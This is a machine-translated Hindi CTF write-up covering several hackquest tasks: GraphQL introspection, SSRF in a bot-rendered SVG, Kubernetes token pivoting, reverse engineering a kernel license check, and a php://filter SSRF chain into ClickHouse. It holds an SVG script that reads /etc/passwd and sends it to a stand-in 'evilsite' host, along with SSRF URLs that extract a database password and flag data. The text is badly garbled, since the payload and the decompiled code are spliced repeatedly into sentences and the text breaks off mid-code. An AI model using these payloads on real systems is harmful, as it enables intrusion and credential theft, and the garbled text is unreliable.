पहला चरण: ग्राफकल

• प्रारंभ में, हम एक js क्लाइंट-साइड गेम और रेटिंग के साथ एक वेब एप्लिकेशन को प्राप्त करते हैं।
  
• स्थिर के अलावा, बैकएंड में केवल 1 अनुरोध किया गया है:
  
• आप निम्नलिखित क्वेरी के साथ सभी प्रकारों और उनके क्षेत्रों की सूची प्राप्त कर सकते हैं:
  

  { __schema { types { name fields { name } } } } 

• हम टिप्पणी क्षेत्र देखते हैं, इसे प्रारंभिक अनुरोध में अनुरोध करते हैं और अगले चरण के लिए एक लिंक प्राप्त करते हैं।

दूसरा चरण: बॉट को त्यागें

• एक बॉट हमें सर्वर पर मिलता है और हमारे लिए एक अलग चैनल बनाता है
  
• तुरंत हमें gitea में SSRF का एक संकेत दिखाई देता है, लेकिन मुझे ऐसा कभी नहीं मिला = (
• हम स्थानीय फ़ाइल पढ़ने की कोशिश करते हैं:
  

   <svg width="10cm" height="3cm" viewBox="0 0 1000 300" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script type="text/javascript"> for (var i=0; trefs[i]; i++) { var xhr = new XMLHttpRequest(); xhr.open("GET","/etc/passwd",false); xhr.send(""); var xhr2 = new XMLHttpRequest(); xhr2.open("GET", "http://evilsite/?p="+btoa(xhr.responseText),false); xhr2.send(""); } </script> </svg> = "3 सेमी" viewBox = " <svg width="10cm" height="3cm" viewBox="0 0 1000 300" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script type="text/javascript"> for (var i=0; trefs[i]; i++) { var xhr = new XMLHttpRequest(); xhr.open("GET","/etc/passwd",false); xhr.send(""); var xhr2 = new XMLHttpRequest(); xhr2.open("GET", "http://evilsite/?p="+btoa(xhr.responseText),false); xhr2.send(""); } </script> </svg> etc / पासवर्ड", झूठी); <svg width="10cm" height="3cm" viewBox="0 0 1000 300" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script type="text/javascript"> for (var i=0; trefs[i]; i++) { var xhr = new XMLHttpRequest(); xhr.open("GET","/etc/passwd",false); xhr.send(""); var xhr2 = new XMLHttpRequest(); xhr2.open("GET", "http://evilsite/?p="+btoa(xhr.responseText),false); xhr2.send(""); } </script> </svg> 

• हम / etc / passwd प्राप्त करते हैं और 2 उपयोगकर्ताओं को देखते हैं: कार्यकर्ता, जिनकी ओर से svg और gitea प्रदान किए जाते हैं
  

   worker:x:1000:1000::/home/worker:/bin/sh gitea:x:1001:1001::/home/gitea:/bin/sh / श worker:x:1000:1000::/home/worker:/bin/sh gitea:x:1001:1001::/home/gitea:/bin/sh 

• यह कदम मैं एक अनपेक्षित मार्ग से गुजरा: in.bash_history, कार्यकर्ता के पास ssh कुंजी और सर्वर पते के लिए अगले चरण के लिए पथ थे
  

   cd nano .ssh/connect_info echo > .bash_history exit cd cd .ssh/ chmod 755 id_rsa ls -al cat id_rsa exit 

  
  

  तीसरा चरण: कुबेरनेट्स

• ऐसा लगता है कि मैं सबसे पहले इस मुकाम पर पहुंचा हूं। .bash_history और ps खाली थे, और इस मैंने निष्कर्ष निकाला कि एक अलग वातावरण प्रत्येक आईपी के लिए बनाया जाता से
  
• माउंट में कुबेरनेट्स के लिए एक टोकन मिला
  
• पहले यह स्पष्ट नहीं था कि टोकन कहाँ से मिलेगा, और मैंने ग्रिड को स्कैन करना शुरू कर दिया ... और कुछ बिंदु पर मैंने पड़ोसियों को क्लाउड में चलना शुरू किया
• कि जारी किया गया था संकेत के बाद, किसी भी सबनेट स्कैन, और लगभग तुरंत यह पाया गया बाकी एपीआई Kubernetes-एक
• इस बिंदु पर, मुझे एहसास हुआ कि मैं सर्वर पर अकेला नहीं था, और कुछ काटने की इच्छा नहीं थी, उदाहरण के लिए, cmdline मास्किंग, इसलिए मैंने इसे करने का फैसला किया आसान यह अधिक दर्दनाक है और ssh के माध्यम से अपने आप को प्रॉक्सी को सॉक्स करता है
• kubectl get pods का उपयोग करते हुए, कंटेनरों की एक सूची प्राप्त की गई थी, और कुबेरनेट्स प्रलेखन ने सुझाव दिया कि निष्पादन को एक ही वाक्यविन्यास के साथ docker के रूप में इस्तेमाल किया जा सकता है
• तो फिर वहाँ मोज़े प्रॉक्सी के माध्यम से जो कार्यकारी के लिए WebSocket नहीं हुआ था के साथ दुख की 1.5 घंटे थे। मैं समाप्त करने के लिए सीधे ssh के माध्यम से kubectl जा रहा हूँ
  
• दूसरे कंटेनर में एक नया टोकन है और पहले से ही पड़ोसी नामस्थान zn2 में क्लस्टर की पहुंच है (शुरू में हम नामस्थान zn1 में हैं), जिसमें से लाल रंग दिखाई दे रहा था
• हम पिछले Zeronights से रिपोर्ट @paulaxe को याद करते हैं और उदाहरण के लिए, इस PoC का उपयोग करके RCE प्राप्त करते हैं
• अगला टोकन प्राप्त करने के बाद, आप ध्वज को कुबेरनेट के रहस्यों से खींच सकते हैं
  

दिया गया: jD74nd8_task2.iso फ़ाइल, बूट करने योग्य ISO छवि। छवि के अंदर की फ़ाइलों से, हम यह मान सकते हैं कि यह लिनक्स है: एक कर्नेल boot/kernel.xz कर्नेल है। boot/kernel.xz , एक प्रारंभिक रैमडिस्क boot/rootfs.xz और एक बूट लोडर boot/syslinux/ ।

हम कोर और रैमडिस्क को अनपैक करने की कोशिश कर रहे हैं। रामडिस्क यहाँ एक नियमित cpio संग्रह है जिसे xz द्वारा संपीड़ित किया जाता है। स्क्रिप्ट https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux का उपयोग करके कर्नेल को अनपैक करें । आप कर्नेल जानकारी पर भी ध्यान दे सकते हैं:

 > file kernel.xz kernel.xz: Linux kernel x86 boot executable bzImage, version 5.0.11 (billy@micosoft.com) #1 SMP Sat Aug 25 13:37:00 CEST 2019, RO-rootFS, swap_dev 0x2, Normal VGA 

जिस तरह से, हम आईएसओ इमेज में minimal/rootfs/bin/activator का मुख्य काम पाते हैं: यह सभी डिवाइस में दर्ज ईमेल डेटा और एक्टिवेशन कुंजी लिखने के लिए नीचे आता है /dev/activate फॉरमैट /dev/activate $email|$key में /dev/activate है। $email|$key | सफल सत्यापन कुंजी के मामले में से पढ़ा /dev/activate स्ट्रिंग जारी करेगा ACTIVATED , उत्प्रेरक और इस मामले में, खेल 2048 में शुरू होगा।

यह समय गतिशीलता में कार्य को देखने का है। ऐसा करने के लिए, केवीएम में एमुलेटर चलाएं:

 > qemu-system-x86_64 -enable-kvm -drive format=raw,media=cdrom,readonly,file=jD74nd8_task2.iso 

लिनक्स शुरू होता है और तुरंत ओवरले से /bin/activator को लॉन्च करता है। यह /etc/inittab में वर्तनी है। लंबे समय तक बिनार में खुदाई से बचने के लिए, मैं एक शेल प्राप्त करना चाहता था और कम से कम /proc प्रोक और सीस को देखना चाहता था। मेरे लिए सबसे आसान तरीका यह था कि मैं केवल उस जगह पर आइसो फाइल अपलोड करूं जहां एक्टिविस्ट स्क्रिप्ट खुद स्थित है। बल्कि sleep 1 पुट /bin/sh , यानी धारावाहिक में प्रवेश करने के प्रत्येक प्रयास के बाद मुझे एक खोल मिला।

तो एक शेल है: हम देखते हैं कि /proc/kallsyms अनुपस्थित है, अर्थात्। कोई गिरी प्रतीकों। उनके साथ, ज़ाहिर है, यह बहुत तेज़ होगा, लेकिन यह ठीक है। हम डिवाइस /dev/activator बारे में जानकारी की तलाश कर रहे हैं:

 / # ls -la /dev/activate crw------- 1 0 0 252, 0 Oct 15 08:57 /dev/activate / # cat /proc/devices Character devices: ... 252 activate ... Block devices: ... 

में जानकारी से /proc/devices से पता चलता है कि इस चरित्र (चार) डिवाइस है, जो प्रमुख 252 और नाबालिग के संस्करण - 0।

यह कर्नेल बिनार में इस उपकरण के पंजीकरण समारोह को खोजने के लिए इसके write संचालन के लिए हैंडलर खोजने का समय है। ऐसा करने के लिए, स्ट्रिंग activate संदर्भ देखें। लेकिन कर्नेल में ऐसी कोई रेखा नहीं है, शायद यह किसी तरह छिपा हुआ है।

: अगला प्रयास कार्यों कि चरित्र उपकरणों के पंजीकरण के लिए जिम्मेदार हैं खोजने की कोशिश करने के लिए cdev_add और register_chrdev । यह क्रॉस-रेफ़रिंग /dev/console या किसी अन्य वर्ण डिवाइस द्वारा किया जा सकता है और कर्नेल स्रोत कोड ले जा सकता है (मैंने संस्करण 5.0.11 लिया, लेकिन मुझे यकीन नहीं है कि संस्करण सही है)। उपकरणों कि पंजीकृत हैं की सूची देखें, नहीं वहाँ मुख्य संस्करण 252 शायद पंजीकरण के साथ एक डिवाइस है नहीं इन दोनों कार्यों है।

आइए गतिशीलता में कुछ अन्य सुराग देखने की कोशिश करें:

 / # ls -la /sys/dev/char/252:0 lrwxrwxrwx 1 0 0 0 Oct 15 09:00 /sys/dev/char/252:0 -> ../../devices/virtual/EEy????I/activate 

यहाँ EEy????I - EEy????I डिवाइस EEy????I हम इस लाइन को बिनार में खोजने की कोशिश करते हैं और यह वहां है!

हालांकि इसका कोई क्रॉस-रेफरेंस नहीं मिला, लेकिन इसके बगल में स्ट्रिंग्स के समान डेटा दिखाई देता है। आप कोड को देखो, तो है कि उन्हें का उपयोग करता है, तो आप यह है कि इन आवश्यक संचालकों पढ़ सकते हैं और लिखने डिवाइस हैं देखेंगे activate है, जो एक सरल XOR द्वारा एन्क्रिप्टेड होते हैं।

पढ़ने आपरेशन प्रसंस्करण समारोह:

लेखन ऑपरेशन को संसाधित करने का कार्य, यह एक लाइसेंस जांच भी है:

सक्रियण सत्यापन कोड के एक त्वरित निरीक्षण से पता चला कि केवल 0xFFFFFFFF811F094B पते पर एक ब्रेकपॉइंट डालना और वहां क्या हो रहा है, इस बारे में वास्तव में जानकारी दिए बिना सक्रियण कोड को चुनना आसान है। ऐसा करने के लिए, q -u को -s ध्वज के साथ चलाएँ। इस स्थिति में, qemu gdb स्टब चलाता है, जो आपको किसी भी gdb क्लाइंट का उपयोग करने की अनुमति देता है। आईडीए प्रो में ऐसा करने का सबसे आसान और तेज़ तरीका है, अगर आपके पास लाइसेंस है। लेकिन कंसोल जीडीबी में सब कुछ करने से किसी को मना नहीं है।

हम आधिकारिक ट्यूटोरियल में वर्णित सब कुछ करते हैं। अब आपको पहले से चल रहे कर्नेल के अंदर प्रसंस्करण फ़ंक्शन को खोजने की आवश्यकता है।

चूंकि कर्नेल KASLR समर्थन के साथ बनाया गया है, इसलिए चालू कर्नेल के पतों को एक यादृच्छिक ऑफ़सेट पर स्थानांतरित किया जाता है जो कि कर्नेल शुरू होने पर हर बार उत्पन्न होता है। हम इस ऑफसेट की गणना करते हैं (हम डिबग किए गए कर्नेल के कोड में अद्वितीय बाइट अनुक्रम का पता लेते हैं और इस क्रम के बिनार से पते को घटाते हैं) और, सक्रियण फ़ंक्शन को पते में जोड़ते हुए, हम इसे मेमोरी में पाते हैं। सब कुछ, अब यह छोटे पर निर्भर है। एक ब्रेकपॉइंट सेट करें और कोड चुनें।

कार्य एक भुगतान पृष्ठ है, जहां एकमात्र दिलचस्प पैरामीटर callback_url था।

हम आपकी साइट को इंगित करते हैं और अनुरोध को पकड़ते हैं:

 http://82.202.226.176/?callback_url=http://attacker.tld/&pan=&amount=&payment_id= 

 POST / HTTP/1.0 Host: attacker.tld Connection: close Content-Length: 21 Content-Type: application/json amount=0&payment_id=0 

यदि साइट अल्फ़ान्यूमेरिक स्ट्रिंग लौटाती है तो केवल HTTP प्रतिक्रिया दिखाई देती है। जवाब के उदाहरण:

 {"result":"Success.","msg":"Response: testresponse"} {"result":"Invalid status code.","msg":"Non-alphanumeric response."} 

हम callback_url डेटा के रूप में प्रयास करते हैं :, परीक्षण करें और समझें कि, सबसे अधिक संभावना है, यह PHP है।

 http://82.202.226.176/?callback_url=data:,test&pan=&amount=&payment_id= 

हम स्थानीय फ़ाइलों को पढ़ने के लिए php: // फ़िल्टर का उपयोग करते हैं और कन्वर्ट का उपयोग करके प्रतिक्रिया को एन्कोड करते हैं ।बेस -64-एनकोड ताकि उत्तर अल्फ़ान्यूमेरिक से मेल खाता हो। वर्ण +, / और = के कारण, कभी-कभी उत्तर प्रदर्शित करने के लिए कई बेस 64 कॉल को संयोजित करना आवश्यक होता है।

 http://82.202.226.176/?pan=xxx&amount=xxx&payment_id=xxx&callback_url=php://filter/convert.base64-encode|convert.base64-encode/resource=./index.php http://82.202.226.176/?pan=xxx&amount=xxx&payment_id=xxx&callback_url=php://filter/convert.base64-encode|convert.base64-encode/resource=./includes/db.php 

 <?php error_reporting(0); /* * DB configuration */ $config = [ 'host' => 'localhost', 'port' 

प्रतिक्रिया आउटपुट 200 बाइट्स तक सीमित है, लेकिन टुकड़ों से हम स्थानीयहोस्ट पर डेटाबेस की उपलब्धता के बारे में सीखते हैं। हम callback_url के माध्यम से बंदरगाहों के माध्यम से सॉर्ट करते हैं और DeteAct ब्लॉग पर ClickHouse में इंजेक्शन पर एक नया लेख ढूंढते हैं , जो अजीब कार्य नाम "HOUSE OF BECHED" से मेल खाता है।

ClickHouse में एक HTTP इंटरफ़ेस है जो आपको मनमाने अनुरोध करने की अनुमति देता है, जो SSRF में उपयोग करने के लिए बहुत सुविधाजनक है।

हम दस्तावेज़ीकरण पढ़ते हैं, कॉन्फ़िगरेशन से खाता प्राप्त करने का प्रयास करते हैं।

 http://82.202.226.176/?callback_url=php://filter/convert.base64-encode|convert.base64-encode/resource=/etc/clickhouse-server/users.xml&pan=&amount=&payment_id= 

 <?xml version="1.0"?> <yandex> <!-- Profiles of settings. --> <profiles> <!-- Default settibm 

फिर से, उत्पादन को सीमित करना और मानक फ़ाइल द्वारा निर्णय लेना, वांछित क्षेत्र बहुत दूर है।

String.strip_tags फ़िल्टर का उपयोग करके अतिरिक्त काट लें।

 http://82.202.226.176/?callback_url=php://filter/string.strip_tags|convert.base64-encode/resource=/etc/clickhouse-server/users.xml&pan=&amount=&payment_id= 

लेकिन पासवर्ड प्राप्त होने तक आउटपुट लंबाई अभी भी पर्याप्त नहीं है। एक संपीड़न फ़िल्टर zlib.deflate जोड़ें।

 http://82.202.226.176/?callback_url=php://filter/string.strip_tags|zlib.deflate|convert.base64-encode|convert.base64-encode/resource=/etc/clickhouse-server/users.xml&pan=&amount=&payment_id= 

और रिवर्स ऑर्डर में स्थानीय रूप से पढ़ें:

 print(file_get_contents('php://filter/convert.base64-decode|convert.base64-decode|zlib.inflate/resource=data:,NCtYaTVWSUFBbVFTRnd1VFoyZ0FCN3hjK0JRU2tDNUt6RXZKejBXMms3QkxETkVsZUNueVNsSnFja1pxU2taK2FYRnFYbjVHYW1JQmZoZWo4a0RBeWtyZkFGME5QajBwcVdtSnBUa2xWRkNFNlJaTUVWSkZRU0JSd1JZNWxGRTFVY3NLYllVa0JiV2NFbXNGUTRYOElv')); 

पासवर्ड प्राप्त करने के बाद, हम निम्न प्रकार से ClickHouse अनुरोध भेज सकते हैं:

 http://localhost:8123/?query=select%20'xxx'&user=default&password=bechedhousenoheap http://default:bechedhousenoheap@localhost:8123/?query=select%20'xxx' 

लेकिन जब से हम शुरू में POST भेजते हैं, हमें पुनर्निर्देशन का उपयोग करके इसे प्राप्त करना होगा। और अंतिम अनुरोध इस तरह से निकला (इस स्तर पर मैं बहुत गूंगा था, क्योंकि मापदंडों के प्रसंस्करण के बड़े घोंसले के कारण, मैंने विशेष वर्णों को गलत तरीके से एन्कोड किया और अनुरोध को निष्पादित नहीं कर सका)

 http://82.202.226.176/?callback_url=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=http://blackfan.ru/x?r=http://localhost:8123/%253Fquery=select%252520'xxx'%2526user=default%2526password=bechedhousenoheap&pan=&amount=&payment_id= 

ठीक है, तो बस डेटाबेस से डेटा प्राप्त करें:

 select name from system.tables select name from system.columns where table='flag4zn' select bechedflag from flag4zn 

 http://82.202.226.176/?callback_url=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=http://blackfan.ru/x?r=http://localhost:8123/%253Fquery=select%252520bechedflag%252520from%252520flag4zn%2526user=default%2526password=bechedhousenoheap&pan=&amount=&payment_id= 

दिन 4 / ASR-EHD - AV1ct0r द्वारा लिखें

पीटर थोड़ा पागल है: वह हमेशा एन्क्रिप्टेड कनेक्शन का उपयोग करता है। यह सुनिश्चित करने के लिए कि एल्गोरिदम सुरक्षित हैं पीटर अपने स्वयं के क्लाइंट का उपयोग करता है। उन्होंने हमें एक ट्रैफ़िक डंप भी दिया, जो उनके कस्टम क्लाइंट का उपयोग करते समय बनाया गया था। क्या पीटर का कनेक्शन वास्तव में सुरक्षित है?

https://hackquest.zeronights.org/downloads/task4/8Jdl3f_client.tar
https://hackquest.zeronights.org/downloads/task4/d8f3ND_dump.tar

1. आईडीए प्रो में क्लाइंट फ़ाइल खोलें और देखें कि यह ध्वज का हिस्सा डाउनलोड कर सकता है। सर्वर से फाइल https://ssltest.a1exdandy.me:443/ । कमांड लाइन से डाउनलोड करने के लिए फ़ाइल का कौन सा भाग (किस बाइट से) लिया जाता है।

   
   

    signed __int64 __fastcall main(int argc, char **argv, char **a3) { size_t v4; // rsi __int64 v5; // ST48_8 int v6; // [rsp+10h] [rbp-450h] int v7; // [rsp+14h] [rbp-44Ch] __int64 v8; // [rsp+20h] [rbp-440h] __int64 v9; // [rsp+28h] [rbp-438h] __int64 v10; // [rsp+30h] [rbp-430h] __int64 v11; // [rsp+38h] [rbp-428h] __int64 v12; // [rsp+40h] [rbp-420h] char ptr; // [rsp+50h] [rbp-410h] unsigned __int64 v14; // [rsp+458h] [rbp-8h] v14 = __readfsqword(0x28u); if ( argc != 3 ) return 0xFFFFFFFFLL; v6 = atoi(argv[1]); v7 = atoi(argv[2]); if ( v6 < 0 || v7 < 0 || v7 <= v6 ) return 0xFFFFFFFFLL; v8 = 0LL; v9 = 0LL; v10 = 0LL; OPENSSL_init_ssl(0LL, 0LL); OPENSSL_init_crypto(2048LL, 0LL); v11 = ENGINE_get_default_DH(2048LL, 0LL); if ( v11 ) { if ( (unsigned int)ENGINE_init(v11) ) { v12 = ENGINE_get_DH(v11); if ( v12 ) { v8 = DH_meth_dup(v12); if ( v8 ) { if ( (unsigned int)DH_meth_set_generate_key(v8, dh_1) ) { if ( (unsigned int)ENGINE_set_DH(v11, v8) ) { v5 = TLSv1_2_client_method(v11, v8); v10 = SSL_CTX_new(v5); if ( (unsigned int)SSL_CTX_set_cipher_list(v10, "DHE-RSA-AES128-SHA256") ) { v9 = BIO_new_ssl_connect(v10); BIO_ctrl(v9, 100LL, 0LL, (__int64)"ssltest.a1exdandy.me:443"); if ( BIO_ctrl(v9, 101LL, 0LL, 0LL) >= 0 ) { BIO_ctrl(v9, 101LL, 0LL, 0LL); BIO_printf(v9, "GET /flag.jpg HTTP/1.1\n", argv); BIO_printf(v9, "Host: ssltest.a1exdandy.me\n"); BIO_printf(v9, "Range: bytes=%d-%d\n\n", (unsigned int)v6, (unsigned int)v7); v4 = (signed int)BIO_read(v9, &ptr, 1024LL); fwrite(&ptr, v4, 1uLL, stdout); } else { v4 = 1LL; fwrite("Can't do connect\n", 1uLL, 0x11uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set cipher list\n", 1uLL, 0x16uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set DH methods\n", 1uLL, 0x15uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set generate_key method\n", 1uLL, 0x1EuLL, stderr); } } else { v4 = 1LL; fwrite("Can't dup dh meth\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } } else { v4 = 1LL; fwrite("Can't init engine\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } if ( v11 ) { ENGINE_finish(v11, v4); ENGINE_free(v11); } if ( v8 ) DH_meth_free(v8, v4); if ( v10 ) SSL_CTX_free(v10, v4); if ( v9 ) BIO_free_all(v9, v4); return 0LL; } v11)) signed __int64 __fastcall main(int argc, char **argv, char **a3) { size_t v4; // rsi __int64 v5; // ST48_8 int v6; // [rsp+10h] [rbp-450h] int v7; // [rsp+14h] [rbp-44Ch] __int64 v8; // [rsp+20h] [rbp-440h] __int64 v9; // [rsp+28h] [rbp-438h] __int64 v10; // [rsp+30h] [rbp-430h] __int64 v11; // [rsp+38h] [rbp-428h] __int64 v12; // [rsp+40h] [rbp-420h] char ptr; // [rsp+50h] [rbp-410h] unsigned __int64 v14; // [rsp+458h] [rbp-8h] v14 = __readfsqword(0x28u); if ( argc != 3 ) return 0xFFFFFFFFLL; v6 = atoi(argv[1]); v7 = atoi(argv[2]); if ( v6 < 0 || v7 < 0 || v7 <= v6 ) return 0xFFFFFFFFLL; v8 = 0LL; v9 = 0LL; v10 = 0LL; OPENSSL_init_ssl(0LL, 0LL); OPENSSL_init_crypto(2048LL, 0LL); v11 = ENGINE_get_default_DH(2048LL, 0LL); if ( v11 ) { if ( (unsigned int)ENGINE_init(v11) ) { v12 = ENGINE_get_DH(v11); if ( v12 ) { v8 = DH_meth_dup(v12); if ( v8 ) { if ( (unsigned int)DH_meth_set_generate_key(v8, dh_1) ) { if ( (unsigned int)ENGINE_set_DH(v11, v8) ) { v5 = TLSv1_2_client_method(v11, v8); v10 = SSL_CTX_new(v5); if ( (unsigned int)SSL_CTX_set_cipher_list(v10, "DHE-RSA-AES128-SHA256") ) { v9 = BIO_new_ssl_connect(v10); BIO_ctrl(v9, 100LL, 0LL, (__int64)"ssltest.a1exdandy.me:443"); if ( BIO_ctrl(v9, 101LL, 0LL, 0LL) >= 0 ) { BIO_ctrl(v9, 101LL, 0LL, 0LL); BIO_printf(v9, "GET /flag.jpg HTTP/1.1\n", argv); BIO_printf(v9, "Host: ssltest.a1exdandy.me\n"); BIO_printf(v9, "Range: bytes=%d-%d\n\n", (unsigned int)v6, (unsigned int)v7); v4 = (signed int)BIO_read(v9, &ptr, 1024LL); fwrite(&ptr, v4, 1uLL, stdout); } else { v4 = 1LL; fwrite("Can't do connect\n", 1uLL, 0x11uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set cipher list\n", 1uLL, 0x16uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set DH methods\n", 1uLL, 0x15uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set generate_key method\n", 1uLL, 0x1EuLL, stderr); } } else { v4 = 1LL; fwrite("Can't dup dh meth\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } } else { v4 = 1LL; fwrite("Can't init engine\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } if ( v11 ) { ENGINE_finish(v11, v4); ENGINE_free(v11); } if ( v8 ) DH_meth_free(v8, v4); if ( v10 ) SSL_CTX_free(v10, v4); if ( v9 ) BIO_free_all(v9, v4); return 0LL; } (__int64) "ssltest.a1exdandy.me:443"); signed __int64 __fastcall main(int argc, char **argv, char **a3) { size_t v4; // rsi __int64 v5; // ST48_8 int v6; // [rsp+10h] [rbp-450h] int v7; // [rsp+14h] [rbp-44Ch] __int64 v8; // [rsp+20h] [rbp-440h] __int64 v9; // [rsp+28h] [rbp-438h] __int64 v10; // [rsp+30h] [rbp-430h] __int64 v11; // [rsp+38h] [rbp-428h] __int64 v12; // [rsp+40h] [rbp-420h] char ptr; // [rsp+50h] [rbp-410h] unsigned __int64 v14; // [rsp+458h] [rbp-8h] v14 = __readfsqword(0x28u); if ( argc != 3 ) return 0xFFFFFFFFLL; v6 = atoi(argv[1]); v7 = atoi(argv[2]); if ( v6 < 0 || v7 < 0 || v7 <= v6 ) return 0xFFFFFFFFLL; v8 = 0LL; v9 = 0LL; v10 = 0LL; OPENSSL_init_ssl(0LL, 0LL); OPENSSL_init_crypto(2048LL, 0LL); v11 = ENGINE_get_default_DH(2048LL, 0LL); if ( v11 ) { if ( (unsigned int)ENGINE_init(v11) ) { v12 = ENGINE_get_DH(v11); if ( v12 ) { v8 = DH_meth_dup(v12); if ( v8 ) { if ( (unsigned int)DH_meth_set_generate_key(v8, dh_1) ) { if ( (unsigned int)ENGINE_set_DH(v11, v8) ) { v5 = TLSv1_2_client_method(v11, v8); v10 = SSL_CTX_new(v5); if ( (unsigned int)SSL_CTX_set_cipher_list(v10, "DHE-RSA-AES128-SHA256") ) { v9 = BIO_new_ssl_connect(v10); BIO_ctrl(v9, 100LL, 0LL, (__int64)"ssltest.a1exdandy.me:443"); if ( BIO_ctrl(v9, 101LL, 0LL, 0LL) >= 0 ) { BIO_ctrl(v9, 101LL, 0LL, 0LL); BIO_printf(v9, "GET /flag.jpg HTTP/1.1\n", argv); BIO_printf(v9, "Host: ssltest.a1exdandy.me\n"); BIO_printf(v9, "Range: bytes=%d-%d\n\n", (unsigned int)v6, (unsigned int)v7); v4 = (signed int)BIO_read(v9, &ptr, 1024LL); fwrite(&ptr, v4, 1uLL, stdout); } else { v4 = 1LL; fwrite("Can't do connect\n", 1uLL, 0x11uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set cipher list\n", 1uLL, 0x16uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set DH methods\n", 1uLL, 0x15uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set generate_key method\n", 1uLL, 0x1EuLL, stderr); } } else { v4 = 1LL; fwrite("Can't dup dh meth\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } } else { v4 = 1LL; fwrite("Can't init engine\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } if ( v11 ) { ENGINE_finish(v11, v4); ENGINE_free(v11); } if ( v8 ) DH_meth_free(v8, v4); if ( v10 ) SSL_CTX_free(v10, v4); if ( v9 ) BIO_free_all(v9, v4); return 0LL; } n", 1uLL, 0x11uLL, stderr); signed __int64 __fastcall main(int argc, char **argv, char **a3) { size_t v4; // rsi __int64 v5; // ST48_8 int v6; // [rsp+10h] [rbp-450h] int v7; // [rsp+14h] [rbp-44Ch] __int64 v8; // [rsp+20h] [rbp-440h] __int64 v9; // [rsp+28h] [rbp-438h] __int64 v10; // [rsp+30h] [rbp-430h] __int64 v11; // [rsp+38h] [rbp-428h] __int64 v12; // [rsp+40h] [rbp-420h] char ptr; // [rsp+50h] [rbp-410h] unsigned __int64 v14; // [rsp+458h] [rbp-8h] v14 = __readfsqword(0x28u); if ( argc != 3 ) return 0xFFFFFFFFLL; v6 = atoi(argv[1]); v7 = atoi(argv[2]); if ( v6 < 0 || v7 < 0 || v7 <= v6 ) return 0xFFFFFFFFLL; v8 = 0LL; v9 = 0LL; v10 = 0LL; OPENSSL_init_ssl(0LL, 0LL); OPENSSL_init_crypto(2048LL, 0LL); v11 = ENGINE_get_default_DH(2048LL, 0LL); if ( v11 ) { if ( (unsigned int)ENGINE_init(v11) ) { v12 = ENGINE_get_DH(v11); if ( v12 ) { v8 = DH_meth_dup(v12); if ( v8 ) { if ( (unsigned int)DH_meth_set_generate_key(v8, dh_1) ) { if ( (unsigned int)ENGINE_set_DH(v11, v8) ) { v5 = TLSv1_2_client_method(v11, v8); v10 = SSL_CTX_new(v5); if ( (unsigned int)SSL_CTX_set_cipher_list(v10, "DHE-RSA-AES128-SHA256") ) { v9 = BIO_new_ssl_connect(v10); BIO_ctrl(v9, 100LL, 0LL, (__int64)"ssltest.a1exdandy.me:443"); if ( BIO_ctrl(v9, 101LL, 0LL, 0LL) >= 0 ) { BIO_ctrl(v9, 101LL, 0LL, 0LL); BIO_printf(v9, "GET /flag.jpg HTTP/1.1\n", argv); BIO_printf(v9, "Host: ssltest.a1exdandy.me\n"); BIO_printf(v9, "Range: bytes=%d-%d\n\n", (unsigned int)v6, (unsigned int)v7); v4 = (signed int)BIO_read(v9, &ptr, 1024LL); fwrite(&ptr, v4, 1uLL, stdout); } else { v4 = 1LL; fwrite("Can't do connect\n", 1uLL, 0x11uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set cipher list\n", 1uLL, 0x16uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set DH methods\n", 1uLL, 0x15uLL, stderr); } } else { v4 = 1LL; fwrite("Can't set generate_key method\n", 1uLL, 0x1EuLL, stderr); } } else { v4 = 1LL; fwrite("Can't dup dh meth\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } } else { v4 = 1LL; fwrite("Can't init engine\n", 1uLL, 0x12uLL, stderr); } } else { v4 = 1LL; fwrite("Can't get DH\n", 1uLL, 0xDuLL, stderr); } if ( v11 ) { ENGINE_finish(v11, v4); ENGINE_free(v11); } if ( v8 ) DH_meth_free(v8, v4); if ( v10 ) SSL_CTX_free(v10, v4); if ( v9 ) BIO_free_all(v9, v4); return 0LL; } \ n", 1uLL, 0x12uLL, stderr); signed __int64 __fastcall main(int argc, char **argv, char **a3) { size_t v4; // rsi __int64 v5; // ST48_8 int v6; // [rsp+10h] [rbp-450h] int v7; // [rsp+14h] [rbp-44Ch] __int64 v8; // [rsp+20h] [rbp-440h] __int64 v9; // [rsp+28h] [rbp-438h] __int64 v10; // [rsp+30h] [rbp-430h] __int64 v11; // [rsp+38h] [rbp-428h] __int64 v12; // [rsp+40h] [rbp-420h] char ptr; // [rsp+50h] [rbp-410h] unsigned __int64 v14; // [rsp+458h] [rbp-8h] v14 = __readfsqword(0x28u); if ( argc != 3 ) return 0xFFFFFFFFLL; v6 = atoi(argv[1]); v7 = atoi(argv[2]); if ( v6 < 0 || v7 < 0 || v7 <= v6 ) return 